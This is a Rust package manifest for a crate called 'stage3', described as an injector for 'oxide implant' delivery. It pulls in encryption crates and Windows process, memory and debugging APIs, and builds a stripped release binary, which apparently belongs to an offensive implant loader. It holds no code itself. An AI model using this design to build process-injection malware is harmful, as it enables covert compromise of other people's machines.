[package]
name = "stage3"
version = "0.1.0"
edition = "2021"
authors = ["diemoeve"]
description = "Stage 3 injector for oxide implant delivery"

[dependencies]
# Crypto (oxide-compatible)
aes-gcm = "0.10"
pbkdf2 = "0.12"
sha2 = "0.10"

# Error handling
thiserror = "1.0"

# Windows-specific
[target.'cfg(windows)'.dependencies]
windows = { version = "0.52", features = [
    "Win32_Foundation",
    "Win32_System_Threading",
    "Win32_System_Memory",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_Diagnostics_ToolHelp",
    "Win32_Security",
] }

[profile.release]
opt-level = "s"
lto = true
strip = true
panic = "abort"
